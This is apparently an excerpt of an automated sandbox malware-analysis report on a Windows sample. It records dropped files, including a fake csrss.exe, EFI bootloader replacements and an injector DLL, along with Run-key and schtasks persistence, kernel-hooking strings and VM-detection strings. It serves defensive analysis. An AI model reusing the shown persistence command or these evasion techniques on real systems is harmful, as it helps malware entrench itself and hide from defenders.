Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	File created: C:\Windows\rss\csrss.exe	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	File created: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	File created: C:\EFI\Boot\EfiGuardDxe.efi	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	File created: C:\EFI\Boot\bootx64.efi	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	File created: C:\Windows\windefender.exe	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	File created: C:\EFI\Microsoft\Boot\bootmgfw.efi	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	File created: B:\EFI\Microsoft\Boot\fw.efi (copy)	Jump to dropped file

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	File created: C:\Windows\rss\csrss.exe			Jump to dropped file
Source: C:\Windows\rss\csrss.exe	File created: C:\Windows\windefender.exe			Jump to dropped file

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows

Show sources

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RoughSnow

Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Windows\rss\csrss.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RoughSnow			Jump to behavior
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RoughSnow			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

May modify the system service descriptor table (often done to hook functions)

Show sources

Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp	Binary or memory string: KeServiceDescriptorTable
Source: 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp	Binary or memory string: KeServiceDescriptorTable
Source: csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp	Binary or memory string: KeServiceDescriptorTable
Source: csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp	Binary or memory string: KeServiceDescriptorTable
Source: csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp	Binary or memory string: KeServiceDescriptorTable

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD RST MARKERBAD ALLOCCOUNTBAD RECORD MACBAD SPAN STATEBAD STACK SIZEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDEXIT STATUS -1FILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDLOOKUP TXT: %WMEMPROFILERATENEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREPORT_ID IS 0RUNTIME: BASE=RUNTIME: FULL=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIMEENDPERIODTOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmp	Binary or memory string: VMUSRVC.EXE
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp	Binary or memory string: SHAREDINTAPP.EXESMSS.EXESHAREDINTAPP.EXECSRSS.EXESHAREDINTAPP.EXEWININIT.EXESHAREDINTAPP.EXECSRSS.EXESHAREDINTAPP.EXEWINLOGON.EXESHAREDINTAPP.EXESERVICES.EXESHAREDINTAPP.EXELSASS.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEDWM.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESPOOLSV.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESIHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXECTFMON.EXESHAREDINTAPP.EXEEXPLORER.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEDLLHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESEARCHUI.EXESEARCHUI.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEHXTSR.EXEHXTSR.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEDLLHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXECONHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEUSOCLIENT.EXEUSOCLIENT.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEDLLHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESGRMBROKER.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXE4T4Y4R89UZ.EXESHAREDINTAPP.EXE[SYSTEM PROCESS]VMSRVC.EXEVMUSRVC.EXESYSTEMSYSTEMVMSRVC.EXEVMUSRVC.EXEREGISTRYREGISTRY
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327623272.00000000160D8000.00000004.00000001.sdmp	Binary or memory string: VMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESPOOLSV.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXE4T4Y4R89UZ.EXEVMSRVC.EXEVMUSRVC.EXEVPC-S3VPCUHUB$
Source: csrss.exe	Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGE
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp	Binary or memory string: VMSRVC.EXESVCHOST.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESIHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXECTFMON.EXEVMSRVC.EXEVMUSRVC.EXEEXPLORER.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESEARCHUI.EXESEARCHUI.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEHXTSR.EXEHXTSR.EXE$
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCOMPAIGN_IDCREATED BY CRYPT32.DLLDNSMESSAGE.E2.KEFF.ORGEMBEDDED/%SFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEHTTPS_PROXYI/O TIMEOUTLOCAL ERRORLOST MCACHEMSPANMANUALMETHODARGS(MSWSOCK.DLLNEXT SERVERNIL CONTEXTORANNIS.COMPARSE ERRORPROCESS: %SRAW-CONTROLREFLECT.SETRETRY-AFTERRUNTIME: P RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITETASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION=183WININET.DLLWUP_PROCESS (SENSITIVE) [RECOVERED] ALLOCCOUNT FOUND AT *( GCSCANDONE M->GSIGNAL= MINTRIGGER= NDATAROOTS= NSPANROOTS= PAGES/BYTE
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmp	Binary or memory string: VMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXECONHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEUSOCLIENT.EXEUSOCLIENT.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESGRMBROKER.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXESVCHOST.EXESPOOLSV.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESIHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXECTFMON.EXEEXPLORER.EXESVCHOST.EXEDLLHOST.EXESEARCHUI.EXESEARCHUI.EXESVCHOST.EXEHXTSR.EXEHXTSR.EXE
Source: csrss.exe	Binary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PAR
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp	Binary or memory string: VMSRVC.EXEVMUSRVC.EXESMSS.EXEVMSRVC.EXEVMUSRVC.EXECSRSS.EXEVMSRVC.EXEVMUSRVC.EXEWININIT.EXEVMSRVC.EXEVMUSRVC.EXECSRSS.EXEVMSRVC.EXEVMUSRVC.EXEWINLOGON.EXEVMSRVC.EXEVMUSRVC.EXESERVICES.EXEVMSRVC.EXEVMUSRVC.EXELSASS.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEDWM.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEPATH=C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH;C:\WINDOWS\SYSTEM32;C:\WINDOWS;C:\WINDOWS\SYSTEM32\WBEM;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\;C:\WINDOWS\SYSTEM32\OPENSSH\;C:\WINDOWS\SYSTEM32\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\MICROSOFT\WINDOWSAPPS
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp	Binary or memory string: VMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXE@

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: B:\EFI\Boot\old.efi (copy)	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: C:\EFI\Boot\EfiGuardDxe.efi	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: C:\EFI\Boot\bootx64.efi	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: C:\Windows\windefender.exe	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: C:\EFI\Microsoft\Boot\bootmgfw.efi	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: B:\EFI\Microsoft\Boot\fw.efi (copy)	Jump to dropped file

Source: C:\Windows\rss\csrss.exe

Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	File opened / queried: VBoxGuest
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	File opened / queried: vmci
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	File opened / queried: HGFS
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	File opened / queried: VBoxTrayIPC
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	File opened / queried: VBoxMiniRdrDN

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
